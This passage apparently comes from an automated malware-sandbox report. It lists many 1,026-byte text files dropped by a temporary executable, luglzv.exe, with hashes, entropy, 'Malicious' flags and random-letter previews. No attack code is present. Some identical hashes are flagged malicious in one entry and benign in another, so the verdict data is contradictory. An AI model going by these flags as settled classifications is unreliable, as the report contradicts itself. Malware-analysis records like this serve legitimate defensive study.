Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
                                                                  Preview:LTKMYBSEYZYLWBDLQYQSGHCEKOMUGSMOJLJVFHAICZAEQCNCBEGUYSPUJHNJSDQTVUPUFCNWSVXGWFVWMFIWRQGVLGYUUBXDZXYJMKPAQTJLYUZTWHPYSRLPQBTKDHEWTTWLDXITQQAGNHQLMCYZCGICKEHUUXVCXHMYJQQYOQIXMRPWDNHFRXHXUHBSJQQHJNETRHWEBONEJBHTDQQNCEMAEDULTTSDIGDGEYCFSHOYFMDRTHCJKCFEFLMLVJNHUTISDTYYKQXVYELRXTCPVMTHGMXSDMUSFEPIIFBHCRRCGWXNWEXQGIUUAYBLCIBZGCXXZYYFPOIAUUAZEORINBBTOZEUXMAZYFVDWGLZZHOHNZHSEJYZULRNGAFKDQXEYHMJWAZXCTSLOIDSVWCDDAJVQOZRXWVWCMYQCKXRQMOHVCMJHXERQTMBGRETHKBIQULAPJVABDGMJDULEZZHMATXEUVKGXGGFBUQPNFRZOPVDFONCFHWZHXDJQQLBBLRNEDPABSGIFBWEQTJAGKFRSLLFIXBIADJYQFXLIYTRHHMHAEDZRJJZZSOCKJNBHWWZEZXGEEJOALVQSBDQTYEHCQVMQMBKNHLBFIRUKLCVRFKGJWGONQGFFIPLGGCUDTZOLCUDDOARJHBVHHRZEYWWKNFEXBVKDTVKTGDMSUOSIIJKKXODRUCUDQHPOJRJZICJUGIDYTFJNVOJIFAVDFPGFTUQFDWLLALACJUWFIKJDQRZQVIIULGPKDOEMRGWVXSLFQHDVZJLHRKVFDXZZCYMKQTRZIBEAHUAXZFKIOBFQACDYLWSHXGVQBAYTXLOISPDOUTEJPQXZNCWCWFKRYQGOEIQEKGUMTCROZMZMVLTCMMBZZHLSYRTDCWSSQEKPTOUQZYPJDCZQTZSHURDOLLYIYFPIECQEHEYPDXHDRIYSOEILWHEODCIXNORCUDGORDQCYVQHNTVIZVMIQLRODCUBWDVZCRJJNXNJQMHPXE
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699434772658264
                                                                  Encrypted:false
                                                                  SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                  MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                  SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                  SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                  SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.69782189124949
                                                                  Encrypted:false
                                                                  SSDEEP:24:Ejrsjf7MixEleswsyrKNRsfqDG97h9JFQttKZUsgd:AruwiCl9RyrKzDGvFothJd
                                                                  MD5:0640503E533EFB11CC70F43D2FFF4E26
                                                                  SHA1:EEACB5C334E23451DEF6DF7B1DBC836F8D5DC7F1
                                                                  SHA-256:F1E1D526371BA959E03143C250244912FE0B9C0002FB521B35EBF6B303A45240
                                                                  SHA-512:10A6184DE66D8DCFB784A4CADD010433A6E64B5C2BBDE73C5E804CB9C4A1DD42589D5B3F81004548BD4F4B48CDEC5E59F703C6E1CC91052578C191B0420B3F20
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:true
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:true
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:true
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
